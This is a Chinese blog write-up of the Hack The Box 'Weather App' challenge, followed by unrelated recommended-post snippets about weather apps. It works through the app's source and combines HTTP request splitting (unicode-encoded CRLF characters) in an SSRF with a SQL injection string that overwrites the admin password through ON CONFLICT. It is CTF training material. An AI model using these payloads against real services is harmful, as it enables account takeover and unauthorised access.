HTB之Weather App

最新推荐文章于 2024-08-21 09:35:40 发布
原创 最新推荐文章于 2024-08-21 09:35:40 发布
· 9.1k 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在Hack The Box (HTB) 的Weather App挑战中,如何通过信息收集、理解应用程序工作原理,发现SSRF漏洞和SQL注入点,并最终构造Payload进行攻击的全过程。重点讨论了利用SSRF攻击和SQL注入漏洞注册admin用户并获取flag的策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HTB之Weather App

0x01 挑战说明
CHALLENGE DESCRIPTION
A pit of eternal darkness, a mindless journey of abeyance, this feels like a never-ending dream. I think I'm hallucinating with the memories of my past life, it's a reflection of how thought I would have turned out if I had tried enough. A weatherman, I said! Someone my community would look up to, someone who is to be respected. I guess this is my way of telling you that I've been waiting for someone to come and save me. This weather application is notorious for trapping the souls of ambitious weathermen like me. Please defeat the evil bruxa that's operating this website and set me free! 🧙‍♀️
0x02 收集信息

打开页面,没有找到什么可利用的信息。

在这里插入图片描述

下载所需的文件,里面有此天气程序的源代码和一个docker容器,我们可以在linux上运行此docker容器,然后在127.0.0.1:1337本地访问,以便测试。

在这里插入图片描述

首先要摸清楚该应用程序是如何工作的,才有可能快速找到漏洞所在。

一个个看,首先是helpers/HttpHelpers.js文件:

在这里插入图片描述

此文件有个HttpGet()函数,作用是接收一个url并发起一个请求,然后对返回的数据进行处理。

然后是helpers/WeatherHelpers.js文件:

在这里插入图片描述

此文件定义了一个getWeather函数,该函数调用了HttpGet(url)函数,作用是访问了一个api,并接收处理返回的数据,其中有几个变量,endpoint city country,留意这几个变量,看是否可以注入恶意数据。

查看routes/index.js

发现代码里面有四条可用路由,我们可以知道这是一个应用了Express的Node.js的应用程序:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

查看一下路由/register的代码:

在这里插入图片描述

发现如果想要注册一个用户必须满足两个条件:

  1. 必须是post请求提交
  2. post请求必须来自服务器端

留意条件二,说明我们利用SSRF来攻破这个应用,我们需要注意哪些地方可以利用SSRF。

查看路由/login的代码:

在这里插入图片描述

我们可以知道以下几个信息:

  1. post方式访问
  2. admin用户登录可以访问/app/flag页面,获取flag

这时候,我们就会想到注册一个admin用户,然后登录。但是admin用户很可能已经存在,我们需要继续往下看。

查看/js/目录里的两个文件:

在这里插入图片描述

里面定义了一些常量和调用了上面的getWeather()函数,跳过。

查看views/database.js文件:

先看migrate()函数

在这里插入图片描述

定义username字段的时候用了UNIQUE,所以用户名不能重复,且在创建该表的时候就已经创建了一个admin用户。密码经过使用了随机的32字节转换成16进制后存放进数据库,所以爆破密码是不现实的。

再看register()函数:

在这里插入图片描述

该函数在使用sql语句的时候,没有使用 “ ?”参数化查询,说明可以我们可以在注册用户的时候实施恶意注入攻击。

再看isAdmin()函数:

在这里插入图片描述

显而易见,该函数的功能是判断登录的时候用户是否admin,在查询过程中使用了参数化查询,也消除了恶意字符,没有利用价值。

由上面可知,该应用程序的工作逻辑是这样的:

main.js——>调用getWeather()——>getWeather()调用Httpget()并传递参数api,用来发出GET请求。

0x03 思路

我们将采用SSRF攻击该程序,利用点显然在这里。

在这里插入图片描述

如何构造一个有效的payload发起请求是关键。

我们可以尝试通过截断字符来发出额外的http请求,而且Node 8的http模块很容易通过Request Splitting受到SSRF的攻击。

空格 编码为 		  		\u0120 
\r  编码为	 	 		 \u010D
\n	编码为				 \u010A
字符 “ 和 ” 必须经过URL编码。
0x04 构造Payload

初步构造的url效果为:

GET / HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

GET / HTTP/1.1
Host: 127.0.0.1

该payload还无法产生威胁,根据我上面获取到的信息,register()函数是可以进行SQL注入攻击的,结合SQL攻击。

使username为 admin

password为 1234') ON CONFLICT(username) DO UPDATE SET password = 'admin';--

会产生如下效果:

INSERT INTO users (username, password) VALUES ('admin', 1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--')

如果用户名冲突,密码将更新为admin。

我们可以构造如下url:

GET / HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=1234') ON CONFLICT(username) DO UPDATE SET password = 'admin';--

GET / HTTP/1.1
Host: 127.0.0.1
0x05 编写POC

在这里插入图片描述

WeatherApp
03-25
WeatherApp 一个iOS应用,可获取多个城市的天气预报。 特征 创建登录屏幕,该屏幕导航到步骤1和步骤2。 步骤一 该应用应接受用户的多个城市名称(以逗号分隔),并使用api显示以下属性以获取当前温度。 用户应输入最少3个城市,最多7个城市。 温度(最小和最大) 天气(描述) 风速 第二步 使用GPS查找当前城市 在列表中显示当前城市5天3小时的当前天气预报。 请参考以下链接以获取5天的预测,并通过每天汇总3天来显示5天3小时的上述属性。 入门 克隆仓库 转到项目目录 运行Pod安装 建筑图案 MVVM-C 申请流程 应用程序从MainViewController开始,它提供了两个选项-搜索城市-当前城市 搜索城市 轻触此按钮可转到屏幕,您可以在其中搜索至少3个城市和最多7个城市,以逗号分隔的字符串,它将显示所有天气详细信息 当前的 轻按此按钮,请求用户访问其当前位置的权
Weather App
qq_40710190的博客
04-06 902
Weather App 这道题学到非常多的知识感觉收获满满😋😋😋现在回头重新整理一下思路。 白盒的难点在于如何在一套代码中找到存在的利用点,我想全部看完是不现实的❌ 而如何在一套代码中寻找呢?我目前还没有想到。大致的思路是看主页面,数据库,登录界面,注册见面等可能存在可利用点的页面,发现可利用点是一个难题,发现可利用点后将可利用点串联起来进行利用则又是一个更加困难的问题。 这题需要下载源码白盒分析 可利用点 首先就来看看index.js router.post('/register', (req, res)
weatherapp:weatherApp
05-09
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 自动格式化代码 更改页面<title> 安装依赖项 导入组件 代码分割 添加样式表 后处理CSS 添加CSS预处理器(Sass,Less等) 添加图像,字体和文件 使用public文件夹 更改HTML 在模块系统之外添加资产 何时使用public文件夹 使用全局变量 添加引导程序使用自定义主题 增加流量 添加路由器 添加自定义环境变量 在HTML中引用环境变量 在Shell中添加临时环境变量 在.env添加开发环境变量 我可以使用装饰器吗? 使用AJAX请求获取数据 与API后端集成 节点 Ruby on Rails 在开发中代理API请求 配置代理后出现“无效的主机头”错误 手动配置代理 配置WebSocket代理 在开发中使用HTTPS 在服务器上生成动态<met
WeatherApp:一个简单的天气应用程序,该应用程序显示如何利用天气API(此处使用的是Accuweather API)并在我们的应用程序中显示数据
05-18
WeatherApp 一个简单的天气应用程序,显示了如何利用天气API(此处使用的是Accuweather API)并在我们的应用程序中显示数据。 对于绝对的初学者来说,这是一个非常基本的应用程序。
htb
02-18
【标题】:“htb”通常指的是“Hack The Box”,这是一个在线平台,专注于网络安全教育,特别是渗透测试和道德...用户可以通过下载和分析“htb-main”压缩包中的内容,参与到这个安全挑战之中,提升自己的专业技能。
HTB
02-12
HTB
HTB 地下道 underpass
最新发布
03-04
HTB 地下道 underpass
write-ups:来自CTF和HTB演练的文章
03-21
在IT行业中,特别是网络安全领域,CTF(Capture The Flag)和HTB(Hack The Box)是两种非常流行的技能提升和实战演练方式。CTF比赛通常涉及多种技术挑战,包括密码学、取证分析、二进制漏洞利用、网络渗透以及Web...
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
local-weather-app-iOS:一款基于swift实现的天气预报APP
06-19
Weather App for iOS 简介 通过Swift学习iOS开发之一:天气预报APP 功能 创建 Single View Application with Swift 利用 CoreLocation 模块获取当前位置信息(经纬度) 安装库管理器 CocoaPods 通过 CoacoaPods 配置文件,安装网络通信库 AFNetworking 以经纬度为参数,通过 AFNetworking 调用接口获取天气数据 解析数据,并更新当前温度 UILabel 和天气图片 UIImageView 该实例也展示了进程指示器 UIActivityIndicatorView 的运用 展示
Weather-Web-App:由NodeJs创建Weather Web App
04-09
遇见了全新的天气网络应用程序
weatherApp:在本练习中,您将创建一个使用天气API的Web应用程序用户界面
04-10
现场演示 如果您想在自己的机器上本地运行此应用程序,请按照以下步骤操作 1:git clone 2:然后转到weatherApp目录,您可以通过以下方式启动该应用: 3: npm install (可选) 4: npm start
Weather-app:这是一个简单但不复杂的天气应用程序,我使用openweather API,promise,awaitasync和WebPack构建了该应用程序。 您可以在下面找到实时链接,可以随时检查您的当地天气状况
05-24
天气应用程序:Takss 这是一个简单的天气应用程序,它首先检测用户的位置,然后显示“今日”和“ 5天”天气预报的天气数据,它还允许用户通过在搜索字段中键入城市的名称来查找世界其他城市的天气信息。您也可以更改温度单位,但切换左上角的按钮。 建于 香草JavaScript, CSS预处理程序SCSS, Webpack, 通天塔 stylelint, ESlint 现场演示 入门 先决条件 为了使该项目正常运行,您需要: NodeJS 10以上 设置 首先,您需要使用以下命令使用上面的链接之一来克隆此项目: git clone RESPOSITRY_LINK 然后,您应该运行: npm install 然后,您应该运行: npm run server ,以在本地计算机上运行项目。 恭喜,项目已全面运作。 您可能在image-webpack-loader一些问题,但这取决于
GoodWeather:好天气APP(天气预报,空气质量,生活建议,灾害预报,出行建议,城市切换,城市搜索,天气信息语音播报,语音搜索城市天气,世界国家地区的城市,常用城市,地图天气,地图搜索定位,手动点击定位,壁纸切换,应用自动更新)
03-16
APP介绍与使用 本项目没有自己的构建后台,所以自然不会有什么服务器数据库,数据指向和风天气API,不了解的可以看看我的博客文章,也可以先通过二维码或者下载链接去下载APK体验,使用我会在第一时间回复,感谢您的阅读,山高水长,后会有期〜将项目引入到Android Studio有如下两种方式: 复制在AS的导航位置VSC→从版本控制中检出→Git。然后会删除一个克隆项目的弹窗,复制刚才复制的地址,单击弹窗的克隆按钮就可以克隆GitHub上的项目到自己的AS中了。不过这个时候是比较看你的网速的,项目中的很多内容与你本地环境不同,所以需要下载和配置才行。 点击绿色的代码按钮,点击下载ZIP,直接下载压缩包到计算机本地,然后解压,通过AS的导航栏File→Open找到刚才解压之后的文件,然后就是同步和配置即可。 答疑 在克隆原始码到本地Android Studio中DeBug运行时,进入地图页面时
推荐一款现代风的Android天气应用——WeatherApp-Android
gitblog_00004的博客
05-30 399
推荐一款现代风的Android天气应用——WeatherApp-Android 去发现同类优质开源项目:https://gitcode.com/ 在这个数字化时代,实时获取天气信息是日常生活的重要部分,而WeatherApp-Android正是这样一款既美观又实用的天气应用程序。它利用了OpenWeatherMap API的强大功能,为你带来精准的天气预报,同时展示了现代Android开发的最佳实...
推荐开源项目:天气预报应用Weatherapp
gitblog_00051的博客
05-19 998
推荐开源项目:天气预报应用Weatherapp Weatherapp5 Day Forecast app that works on Android and uses latest tools (Kotlin, Navigation, Room, LiveData, Databinding, Dagger 2)项目地址:https://gitcode.com/gh_mirrors/we/Weat...
Android开源天气预报app - 清新小天气
12-14 1020
#LittleFreshWeather 源码github地址 这是一款简洁的天气预报app--清新小天气,它能够支持国内绝大多数城市,提供包含实时天气、七天预报、实时气象信息及生活指数等预报信息。。。广告编不下去了-_-!!。。。直接上图: 启动画面 城市选择 当前...
Weatherapp 开源项目教程
gitblog_00768的博客
08-21 615
Weatherapp 开源项目教程 Weatherapp5 Day Forecast app that works on Android and uses latest tools (Kotlin, Navigation, Room, LiveData, Databinding, Dagger 2)项目地址:https://gitcode.com/gh_mirrors/we/Weatherapp...
ROS PCQ HTB压缩包内容解析
但是,根据常规解释,“HTB”可能代表以下含义之一: - **Hierarchical Token Bucket**:这是一种数据包调度算法,用于在数据网络中分配带宽资源。 - **Hard-Throughput Bound**:在性能分析中,这可能指的是系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值